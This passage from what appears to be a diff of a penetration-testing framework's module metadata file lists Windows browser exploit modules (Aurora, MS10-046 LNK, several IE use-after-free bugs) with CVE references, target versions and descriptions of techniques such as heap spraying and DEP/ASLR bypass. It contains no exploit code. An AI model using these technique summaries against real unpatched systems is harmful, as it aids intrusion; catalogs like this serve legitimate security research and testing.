"type": "exploit", + "author": [ + "securitylab.ir ", + "jduck " + ], + "description": "This module exploits a vulnerability in the getElementsByTagName function\n as implemented within Internet Explorer.", + "references": [ + "MSB-MS09-072", + "CVE-2009-3672", + "OSVDB-50622", + "BID-37085", + "URL-https://web.archive.org/web/20090316061713/http://taossa.com/archive/bh08sotirovdowd.pdf" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/ms09_072_style_object.rb", + "is_install_path": true, + "ref_name": "windows/browser/ms09_072_style_object", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/ms10_002_aurora": { + "name": "MS10-002 Microsoft Internet Explorer \"Aurora\" Memory Corruption", + "fullname": "exploit/windows/browser/ms10_002_aurora", + "aliases": [], + "rank": 300, + "disclosure_date": "2010-01-14", + "type": "exploit", + "author": [ + "unknown", + "hdm " + ], + "description": "This module exploits a memory corruption flaw in Internet Explorer. This\n flaw was found in the wild and was a key component of the \"Operation Aurora\"\n attacks that lead to the compromise of a number of high profile companies. The\n exploit code is a direct port of the public sample published to the Wepawet\n malware analysis site. The technique used by this module is currently identical\n to the public sample, as such, only Internet Explorer 6 can be reliably exploited.", + "references": [ + "MSB-MS10-002", + "CVE-2010-0249", + "OSVDB-61697", + "URL-https://web.archive.org/web/20100609073233/http://wepawet.iseclab.org/view.php?hash=1aea206aa64ebeabb07237f1e2230d0f&type=js" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/ms10_002_aurora.rb", + "is_install_path": true, + "ref_name": "windows/browser/ms10_002_aurora", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/ms10_002_ie_object": { + "name": "MS10-002 Microsoft Internet Explorer Object Memory Use-After-Free", + "fullname": "exploit/windows/browser/ms10_002_ie_object", + "aliases": [], + "rank": 300, + "disclosure_date": "2010-01-21", + "type": "exploit", + "author": [ + "Peter Vreugdenhil", + "juan vazquez ", + "sinn3r " + ], + "description": "This module exploits a vulnerability found in Internet Explorer's\n mshtml component. Due to the way IE handles objects in memory, it is\n possible to cause a pointer in CTableRowCellsCollectionCacheItem::GetNext\n to be used even after it gets freed, therefore allowing remote code\n execution under the context of the user.\n\n This particular vulnerability was also one of 2012's Pwn2Own\n challenges, and was later explained by Peter Vreugdenhil with exploitation\n details. Instead of Peter's method, this module uses heap spraying like\n the 99% to store a specially crafted memory layout before re-using the\n freed memory.", + "references": [ + "MSB-MS10-002", + "CVE-2010-0248", + "OSVDB-61914", + "URL-http://dvlabs.tippingpoint.com/blog/2012/03/15/pwn2own-2012-challenge-writeup", + "ZDI-10-014" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "IE 8 on Windows XP SP3", + "IE 8 on Windows 7 SP0" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/ms10_002_ie_object.rb", + "is_install_path": true, + "ref_name": "windows/browser/ms10_002_ie_object", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/ms10_018_ie_behaviors": { + "name": "MS10-018 Microsoft Internet Explorer DHTML Behaviors Use After Free", + "fullname": "exploit/windows/browser/ms10_018_ie_behaviors", + "aliases": [], + "rank": 400, + "disclosure_date": "2010-03-09", + "type": "exploit", + "author": [ + "unknown", + "Trancer ", + "Nanika", + "jduck " + ], + "description": "This module exploits a use-after-free vulnerability within the DHTML behaviors\n functionality of Microsoft Internet Explorer versions 6 and 7. This bug was\n discovered being used in-the-wild and was previously known as the \"iepeers\"\n vulnerability. The name comes from Microsoft's suggested workaround to block\n access to the iepeers.dll file.\n\n According to Nico Waisman, \"The bug itself is when trying to persist an object\n using the setAttribute, which end up calling VariantChangeTypeEx with both the\n source and the destination being the same variant. So if you send as a variant\n an IDISPATCH the algorithm will try to do a VariantClear of the destination before\n using it. This will end up on a call to PlainRelease which deref the reference\n and clean the object.\"\n\n NOTE: Internet Explorer 8 and Internet Explorer 5 are not affected.", + "references": [ + "CVE-2010-0806", + "OSVDB-62810", + "BID-38615", + "URL-https://web.archive.org/web/20100929225343/http://www.avertlabs.com/research/blog/index.php/2010/03/09/targeted-internet-explorer-0day-attack-announced-cve-2010-0806/", + "URL-https://web.archive.org/web/20120627174253/http://eticanicomana.blogspot.com/2010/03/aleatory-persitent-threat.html", + "MSB-MS10-018" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "(Automatic) IE6, IE7 on Windows NT, 2000, XP, 2003 and Vista", + "IE 6 SP0-SP2 (onclick)", + "IE 7.0 (marquee)" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/ms10_018_ie_behaviors.rb", + "is_install_path": true, + "ref_name": "windows/browser/ms10_018_ie_behaviors", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/ms10_018_ie_tabular_activex": { + "name": "MS10-018 Microsoft Internet Explorer Tabular Data Control ActiveX Memory Corruption", + "fullname": "exploit/windows/browser/ms10_018_ie_tabular_activex", + "aliases": [], + "rank": 400, + "disclosure_date": "2010-03-09", + "type": "exploit", + "author": [ + "Unknown", + "jduck " + ], + "description": "This module exploits a memory corruption vulnerability in the Internet Explorer\n Tabular Data ActiveX Control. Microsoft reports that version 5.01 and 6 of Internet\n Explorer are vulnerable.\n\n By specifying a long value as the \"DataURL\" parameter to this control, it is possible\n to write a NUL byte outside the bounds of an array. By targeting control flow data\n on the stack, an attacker can execute arbitrary code.", + "references": [ + "CVE-2010-0805", + "OSVDB-63329", + "BID-39025", + "ZDI-10-034", + "MSB-MS10-018" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic (Heap Spray)" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/ms10_018_ie_tabular_activex.rb", + "is_install_path": true, + "ref_name": "windows/browser/ms10_018_ie_tabular_activex", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/ms10_022_ie_vbscript_winhlp32": { + "name": "MS10-022 Microsoft Internet Explorer Winhlp32.exe MsgBox Code Execution", + "fullname": "exploit/windows/browser/ms10_022_ie_vbscript_winhlp32", + "aliases": [], + "rank": 500, + "disclosure_date": "2010-02-26", + "type": "exploit", + "author": [ + "Maurycy Prodeus", + "jduck " + ], + "description": "This module exploits a code execution vulnerability that occurs when a user\n presses F1 on MessageBox originated from VBscript within a web page. When the\n user hits F1, the MessageBox help functionality will attempt to load and use\n a HLP file from an SMB or WebDAV (if the WebDAV redirector is enabled) server.\n\n This particular version of the exploit implements a WebDAV server that will\n serve HLP file as well as a payload EXE. During testing warnings about the\n payload EXE being unsigned were witnessed. A future version of this module\n might use other methods that do not create such a warning.", + "references": [ + "CVE-2010-0483", + "OSVDB-62632", + "MSB-MS10-022", + "URL-https://blogs.technet.com/msrc/archive/2010/02/28/investigating-a-new-win32hlp-and-internet-explorer-issue.aspx", + "URL-https://isec.pl/vulnerabilities/isec-0027-msgbox-helpfile-ie.txt" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "Internet Explorer on Windows" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/ms10_022_ie_vbscript_winhlp32.rb", + "is_install_path": true, + "ref_name": "windows/browser/ms10_022_ie_vbscript_winhlp32", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/ms10_026_avi_nsamplespersec": { + "name": "MS10-026 Microsoft MPEG Layer-3 Audio Stack Based Overflow", + "fullname": "exploit/windows/browser/ms10_026_avi_nsamplespersec", + "aliases": [], + "rank": 300, + "disclosure_date": "2010-04-13", + "type": "exploit", + "author": [ + "Yamata Li", + "Shahin Ramezany ", + "juan vazquez ", + "Jordi Sanchez " + ], + "description": "This module exploits a buffer overflow in l3codecx.ax while processing a\n AVI files with MPEG Layer-3 audio contents. The overflow only allows to overwrite\n with 0's so the three least significant bytes of EIP saved on stack are\n overwritten and shellcode is mapped using the .NET DLL memory technique pioneered\n by Alexander Sotirov and Mark Dowd.\n\n Please note on IE 8 targets, your malicious URL must be a trusted site in order\n to load the .Net control.", + "references": [ + "CVE-2010-0480", + "OSVDB-63749", + "BID-39303", + "MSB-MS10-026", + "URL-http://web.archive.org/web/20110916145030/http://www.exploit-db.com/moaub-5-microsoft-mpeg-layer-3-audio-stack-based-overflow/", + "URL-http://www.phreedom.org/research/bypassing-browser-memory-protections/" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP3 Automatic" + ], + "mod_time": "2025-02-28 09:35:28 +0000", + "path": "/modules/exploits/windows/browser/ms10_026_avi_nsamplespersec.rb", + "is_install_path": true, + "ref_name": "windows/browser/ms10_026_avi_nsamplespersec", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/ms10_042_helpctr_xss_cmd_exec": { + "name": "Microsoft Help Center XSS and Command Execution", + "fullname": "exploit/windows/browser/ms10_042_helpctr_xss_cmd_exec", + "aliases": [], + "rank": 600, + "disclosure_date": "2010-06-09", + "type": "exploit", + "author": [ + "Tavis Ormandy", + "natron " + ], + "description": "Help and Support Center is the default application provided to access online\n documentation for Microsoft Windows. Microsoft supports accessing help documents\n directly via URLs by installing a protocol handler for the scheme \"hcp\". Due to\n an error in validation of input to hcp:// combined with a local cross site\n scripting vulnerability and a specialized mechanism to launch the XSS trigger,\n arbitrary command execution can be achieved.\n\n On IE7 on XP SP2 or SP3, code execution is automatic. If WMP9 is installed, it\n can be used to launch the exploit automatically. If IE8 and WMP11, either can\n be used to launch the attack, but both pop dialog boxes asking the user if\n execution should continue. This exploit detects if non-intrusive mechanisms are\n available and will use one if possible. In the case of both IE8 and WMP11, the\n exploit defaults to using an iframe on IE8, but is configurable by setting the\n DIALOGMECH option to \"none\" or \"player\".\n\n This module creates a WebDAV service from which the payload is copied to the\n victim machine.", + "references": [ + "CVE-2010-1885", + "OSVDB-65264", + "MSB-MS10-042" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic" + ], + "mod_time": "2023-05-30 10:56:41 +0000", + "path": "/modules/exploits/windows/browser/ms10_042_helpctr_xss_cmd_exec.rb", + "is_install_path": true, + "ref_name": "windows/browser/ms10_042_helpctr_xss_cmd_exec", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/ms10_046_shortcut_icon_dllloader": { + "name": "Microsoft Windows Shell LNK Code Execution", + "fullname": "exploit/windows/browser/ms10_046_shortcut_icon_dllloader", + "aliases": [], + "rank": 600, + "disclosure_date": "2010-07-16", + "type": "exploit", + "author": [ + "hdm ", + "jduck ", + "B_H" + ], + "description": "This module exploits a vulnerability in the handling of Windows\n Shortcut files (.LNK) that contain an icon resource pointing to a\n malicious DLL. This module creates a WebDAV service that can be used\n to run an arbitrary payload when accessed as a UNC path.", + "references": [ + "CVE-2010-2568", + "OSVDB-66387", + "MSB-MS10-046" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/ms10_046_shortcut_icon_dllloader.rb", + "is_install_path": true, + "ref_name": "windows/browser/ms10_046_shortcut_icon_dllloader", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/ms10_090_ie_css_clip": { + "name": "MS10-090 Microsoft Internet Explorer CSS SetUserClip Memory Corruption", + "fullname": "exploit/windows/browser/ms10_090_ie_css_clip", + "aliases": [], + "rank": 400, + "disclosure_date": "2010-11-03", + "type": "exploit", + "author": [ + "unknown", + "Yuange", + "Matteo Memelli", + "jduck " + ], + "description": "This module exploits a memory corruption vulnerability within Microsoft's\n HTML engine (mshtml). When parsing an HTML page containing a specially\n crafted CSS tag, memory corruption occurs that can lead arbitrary code\n execution.\n\n It seems like Microsoft code inadvertently increments a vtable pointer to\n point to an unaligned address within the vtable's function pointers. This\n leads to the program counter being set to the address determined by the\n address \"[vtable+0x30+1]\". The particular address depends on the exact\n version of the mshtml library in use.\n\n Since the address depends on the version of mshtml, some versions may not\n be exploitable. Specifically, those ending up with a program counter value\n within another module, in kernel space, or just not able to be reached with\n various memory spraying techniques.\n\n Also, since the address is not controllable, it is unlikely to be possible\n to use ROP to bypass non-executable memory protections.", + "references": [ + "CVE-2010-3962", + "OSVDB-68987", + "BID-44536", + "EDB-15421", + "MSB-MS10-090" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "Debug", + "Internet Explorer 6", + "Internet Explorer 7" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/ms10_090_ie_css_clip.rb", + "is_install_path": true, + "ref_name": "windows/browser/ms10_090_ie_css_clip", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/ms11_003_ie_css_import": { + "name": "MS11-003 Microsoft Internet Explorer CSS Recursive Import Use After Free", + "fullname": "exploit/windows/browser/ms11_003_ie_css_import", + "aliases": [], + "rank": 400, + "disclosure_date": "2010-11-29", + "type": "exploit", + "author": [ + "passerby", + "d0c_s4vage", + "jduck " + ], + "description": "This module exploits a memory corruption vulnerability within Microsoft\\'s\n HTML engine (mshtml). When parsing an HTML page containing a recursive CSS\n import, a C++ object is deleted and later reused. This leads to arbitrary\n code execution.\n\n This exploit utilizes a combination of heap spraying and the\n .NET 2.0 'mscorie.dll' module to bypass DEP and ASLR. This module does not\n opt-in to ASLR. As such, this module should be reliable on all Windows\n versions with .NET 2.0.50727 installed.", + "references": [ + "CVE-2010-3971", + "OSVDB-69796", + "BID-45246", + "URL-http://www.wooyun.org/bugs/wooyun-2010-0885", + "URL-https://seclists.org/fulldisclosure/2010/Dec/110", + "MSB-MS11-003" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "Internet Explorer 8", + "Internet Explorer 7", + "Internet Explorer 6", + "Debug Target (Crash)" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/ms11_003_ie_css_import.rb", + "is_install_path": true, + "ref_name": "windows/browser/ms11_003_ie_css_import", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/ms11_050_mshtml_cobjectelement": { + "name": "MS11-050 IE mshtml!CObjectElement Use After Free", + "fullname": "exploit/windows/browser/ms11_050_mshtml_cobjectelement", + "aliases": [], + "rank": 300, + "disclosure_date": "2011-06-16", + "type": "exploit", + "author": [ + "d0c_s4vage", + "sinn3r ", + "bannedit " + ], + "description": "This module exploits a use-after-free vulnerability in Internet Explorer. The\n vulnerability occurs when an invalid tag exists and other elements\n overlap/cover where the object tag should be when rendered (due to their\n styles/positioning). The mshtml!CObjectElement is then freed from memory because\n it is invalid. However, the mshtml!CDisplay object for the page continues to keep\n a reference to the freed and attempts to call a function on it, leading\n to the use-after-free.\n\n Please note that for IE 8 targets, JRE (Java Runtime Environment) is required\n to bypass DEP (Data Execution Prevention).", + "references": [ + "CVE-2011-1260", + "OSVDB-72950", + "MSB-MS11-050", + "URL-http://d0cs4vage.blogspot.com/2011/06/insecticides-dont-kill-bugs-patch.html" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "Internet Explorer 7 on XP SP3", + "Internet Explorer 7 on Windows Vista", + "Internet Explorer 8 on XP SP3", + "Internet Explorer 8 on Windows 7", + "Debug Target (Crash)" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/ms11_050_mshtml_cobjectelement.rb", + "is_install_path": true, + "ref_name": "windows/browser/ms11_050_mshtml_cobjectelement", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/ms11_081_option": { + "name": "MS11-081 Microsoft Internet Explorer Option Element Use-After-Free", + "fullname": "exploit/windows/browser/ms11_081_option", + "aliases": [], + "rank": 300, + "disclosure_date": "2012-10-11", + "type": "exploit", + "author": [ + "Ivan Fratric", + "juan vazquez ", + "sinn3r " + ], + "description": "This module exploits a vulnerability in Microsoft Internet Explorer. A memory\n corruption may occur when the Option cache isn't updated properly, which allows\n other JavaScript methods to access a deleted Option element, and results in code\n execution under the context of the user.", + "references": [ + "CVE-2011-1996", + "OSVDB-76208", + "MSB-MS11-081", + "URL-http://ifsec.blogspot.com/2011/10/internet-explorer-option-element-remote.html", + "URL-http://pastebin.com/YLH725Aj" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "IE 8 on Windows XP SP3", + "IE 8 on Windows Vista", + "IE 8 on Windows 7" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/ms11_081_option.rb", + "is_install_path": true, + "ref_name": "windows/browser/ms11_081_option", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/ms11_093_ole32": { + "name": "MS11-093 Microsoft Windows OLE Object File Handling Remote Code Execution", + "fullname": "exploit/windows/browser/ms11_093_ole32", + "aliases": [], + "rank": 300, + "disclosure_date": "2011-12-13", + "type": "exploit", + "author": [ + "Luigi Auriemma", + "juan vazquez " + ], + "description": "This module exploits a type confusion vulnerability in the OLE32 component of\n Windows XP SP3. The vulnerability exists in the CPropertyStorage::ReadMultiple\n function.\n\n A Visio document with a specially crafted Summary Information Stream embedded allows\n to get remote code execution through Internet Explorer, on systems with Visio Viewer\n installed.", + "references": [ + "MSB-MS11-093", + "CVE-2011-3400", + "OSVDB-77663", + "BID-50977", + "URL-http://aluigi.org/adv/ole32_1-adv.txt", + "URL-http://www.verisigninc.com/en_US/products-and-services/network-intelligence-availability/idefense/public-vulnerability-reports/articles/index.xhtml?id=966" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "IE 6 on Windows XP SP3 / Visio Viewer 2010", + "IE 7 on Windows XP SP3 / Visio Viewer 2010" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/ms11_093_ole32.rb", + "is_install_path": true, + "ref_name": "windows/browser/ms11_093_ole32", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/ms12_004_midi": { + "name": "MS12-004 midiOutPlayNextPolyEvent Heap Overflow", + "fullname": "exploit/windows/browser/ms12_004_midi", + "aliases": [], + "rank": 300, + "disclosure_date": "2012-01-10", + "type": "exploit", + "author": [ + "Shane Garrett", + "juan vazquez ", + "sinn3r " + ], + "description": "This module exploits a heap overflow vulnerability in the Windows Multimedia\n Library (winmm.dll). The vulnerability occurs when parsing specially crafted\n MIDI files. Remote code execution can be achieved by using the Windows Media Player\n ActiveX control.\n\n Exploitation is done by supplying a specially crafted MIDI file with\n specific events, causing the offset calculation being higher than what is\n available on the heap (0x400 allocated by WINMM!winmmAlloc), and then allowing\n us to either \"inc al\" or \"dec al\" a byte. This can be used to corrupt an array\n (CImplAry) we setup, and force the browser to confuse types from tagVARIANT objects,\n which leverages remote code execution under the context of the user.\n\n Note: At this time, for IE 8 target, msvcrt ROP is used by default. However,\n if you know your target's patch level, you may also try the 'MSHTML' advanced\n option for an info leak based attack. Currently, this module only supports two\n MSHTML builds: 8.0.6001.18702, which is often seen in a newly installed XP SP3.\n Or 8.0.6001.19120, which is patch level before the MS12-004 fix.\n\n Also, based on our testing, the vulnerability does not seem to trigger when\n the victim machine is operated via rdesktop.", + "references": [ + "MSB-MS12-004", + "CVE-2012-0003", + "OSVDB-78210", + "BID-51292" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "IE 6 on Windows XP SP3", + "IE 7 on Windows XP SP3", + "IE 8 on Windows XP SP3" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/ms12_004_midi.rb", + "is_install_path": true, + "ref_name": "windows/browser/ms12_004_midi", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/ms12_037_ie_colspan": { + "name": "MS12-037 Microsoft Internet Explorer Fixed Table Col Span Heap Overflow", + "fullname": "exploit/windows/browser/ms12_037_ie_colspan", + "aliases": [], + "rank": 300, + "disclosure_date": "2012-06-12", + "type": "exploit", + "author": [ + "Alexandre Pelletier", + "mr_me ", + "binjo", + "sinn3r ", + "juan vazquez " + ], + "description": "This module exploits a heap overflow vulnerability in Internet Explorer caused\n by an incorrect handling of the span attribute for col elements from a fixed table,\n when they are modified dynamically by javascript code.", + "references": [ + "CVE-2012-1876", + "OSVDB-82866", + "BID-53848", + "MSB-MS12-037" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "IE 8 on Windows XP SP3 with msvcrt ROP", + "IE 8 on Windows 7 SP1" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/ms12_037_ie_colspan.rb", + "is_install_path": true, + "ref_name": "windows/browser/ms12_037_ie_colspan", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/ms12_037_same_id": { + "name": "MS12-037 Microsoft Internet Explorer Same ID Property Deleted Object Handling Memory Corruption", + "fullname": "exploit/windows/browser/ms12_037_same_id", + "aliases": [], + "rank": 300, + "disclosure_date": "2012-06-12", + "type": "exploit", + "author": [ + "Dark Son", + "Unknown", + "Yichong Lin", + "juan vazquez " + ], + "description": "This module exploits a memory corruption flaw in Internet Explorer 8 when\n handling objects with the same ID property. At the moment this module targets\n IE8 over Windows XP SP3 and Windows 7. This module supports heap massaging\n as well as the heap spray method seen in the wild (Java msvcrt71.dll).", + "references": [ + "MSB-MS12-037", + "CVE-2012-1875", + "OSVDB-82865", + "URL-http://labs.alienvault.com/labs/index.php/2012/ongoing-attacks-exploiting-cve-2012-1875/", + "URL-https://twitter.com/binjo/status/212795802974830592", + "URL-https://www.rapid7.com/blog/post/2012/06/18/metasploit-exploits-critical-microsoft-vulnerabilities" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "IE 8 on Windows XP SP3 with msvcrt ROP", + "IE 8 on Windows XP SP3 with JRE ROP", + "IE 8 on Windows 7 SP1/Vista SP2 with JRE ROP" + ], + "mod_time": "2022-01-23 15:28:32 +0000", + "path": "/modules/exploits/windows/browser/ms12_037_same_id.rb", + "is_install_path": true, + "ref_name": "windows/browser/ms12_037_same_id", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/ms13_009_ie_slayoutrun_uaf": { + "name": "MS13-009 Microsoft Internet Explorer SLayoutRun Use-After-Free", + "fullname": "exploit/windows/browser/ms13_009_ie_slayoutrun_uaf", + "aliases": [], + "rank": 200, + "disclosure_date": "2013-02-13", + "type": "exploit", + "author": [ + "Scott Bell " + ], + "description": "This module exploits a use-after-free vulnerability in Microsoft Internet Explorer\n where a CParaElement node is released but a reference is still kept\n in CDoc. This memory is reused when a CDoc relayout is performed.", + "references": [ + "CVE-2013-0025", + "OSVDB-90122", + "MSB-MS13-009", + "URL-http://security-assessment.com/files/documents/advisory/ie_slayoutrun_uaf.pdf" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "IE 8 on Windows XP SP3" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/ms13_009_ie_slayoutrun_uaf.rb", + "is_install_path": true, + "ref_name": "windows/browser/ms13_009_ie_slayoutrun_uaf", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/ms13_022_silverlight_script_object": { + "name": "MS13-022 Microsoft Silverlight ScriptObject Unsafe Memory Access", + "fullname": "exploit/windows/browser/ms13_022_silverlight_script_object", + "aliases": [], + "rank": 300, + "disclosure_date": "2013-03-12", + "type": "exploit", + "author": [ + "James Forshaw", + "Vitaliy Toropov", + "juan vazquez " + ], + "description": "This module exploits a vulnerability in Microsoft Silverlight. The vulnerability exists on\n the Initialize() method from System.Windows.Browser.ScriptObject, which access memory in an\n unsafe manner. Since it is accessible for untrusted code (user controlled) it's possible\n to dereference arbitrary memory which easily leverages to arbitrary code execution. In order\n to bypass DEP/ASLR a second vulnerability is used, in the public WriteableBitmap class\n from System.Windows.dll. This module has been tested successfully on IE6 - IE10, Windows XP\n SP3 / Windows 7 SP1.", + "references": [ + "CVE-2013-0074", + "CVE-2013-3896", + "OSVDB-91147", + "OSVDB-98223", + "BID-58327", + "BID-62793", + "MSB-MS13-022", + "MSB-MS13-087", + "PACKETSTORM-123731" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows x86/x64" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/ms13_022_silverlight_script_object.rb", + "is_install_path": true, + "ref_name": "windows/browser/ms13_022_silverlight_script_object", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/ms13_037_svg_dashstyle": { + "name": "MS13-037 Microsoft Internet Explorer COALineDashStyleArray Integer Overflow", + "fullname": "exploit/windows/browser/ms13_037_svg_dashstyle", + "aliases": [], + "rank": 300, + "disclosure_date": "2013-03-06", + "type": "exploit", + "author": [ + "Nicolas Joly", + "4B5F5F4B", + "juan vazquez ", + "sinn3r " + ], + "description": "This module exploits an integer overflow vulnerability on Internet Explorer.\n The vulnerability exists in the handling of the dashstyle.array length for vml\n shapes on the vgx.dll module.\n\n The exploit has been built and tested specifically against Windows 7 SP1 with\n Internet Explorer 8. It uses either JRE6 or an information leak (to ntdll) to\n bypass ASLR, and by default the info leak is used. To make sure the leak is\n successful, the ntdll version should be either v6.1.7601.17514 (the default dll\n version on a newly installed/unpatched Windows 7 SP1), or ntdll.dll v6.1.7601.17725\n (installed after apply MS12-001). If the target doesn't have the version the exploit\n wants, it will refuse to attack by sending a fake 404 message (webpage not found).\n\n If you wish to try the JRE6 component instead to bypass ASLR, you can set the\n advanced datastore option to 'JRE6'. If JRE6 is chosen but the target doesn't\n have this particular component, the exploit will also refuse to attack by\n sending a 404 message.", + "references": [ + "CVE-2013-2551", + "OSVDB-91197", + "BID-58570", + "MSB-MS13-037", + "URL-http://binvul.com/viewthread.php?tid=311" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "IE 8 on Windows 7 SP1" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/ms13_037_svg_dashstyle.rb", + "is_install_path": true, + "ref_name": "windows/browser/ms13_037_svg_dashstyle", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/ms13_055_canchor": { + "name": "MS13-055 Microsoft Internet Explorer CAnchorElement Use-After-Free", + "fullname": "exploit/windows/browser/ms13_055_canchor", + "aliases": [], + "rank": 300, + "disclosure_date": "2013-07-09", + "type": "exploit", + "author": [ + "Jose Antonio Vazquez Gonzalez", + "Orange Tsai", + "Peter Vreugdenhil", + "sinn3r " + ], + "description": "In IE8 standards mode, it's possible to cause a use-after-free condition by first\n creating an illogical table tree, where a CPhraseElement comes after CTableRow,\n with the final node being a sub table element. When the CPhraseElement's outer\n content is reset by using either outerText or outerHTML through an event handler,\n this triggers a free of its child element (in this case, a CAnchorElement, but\n some other objects apply too), but a reference is still kept in function\n SRunPointer::SpanQualifier. This function will then pass on the invalid reference\n to the next functions, eventually used in mshtml!CElement::Doc when it's trying to\n make a call to the object's SecurityContext virtual function at offset +0x70, which\n results a crash. An attacker can take advantage of this by first creating an\n CAnchorElement object, let it free, and then replace the freed memory with another\n fake object. Successfully doing so may allow arbitrary code execution under the\n context of the user.\n\n This bug is specific to Internet Explorer 8 only. It was originally discovered by\n Jose Antonio Vazquez 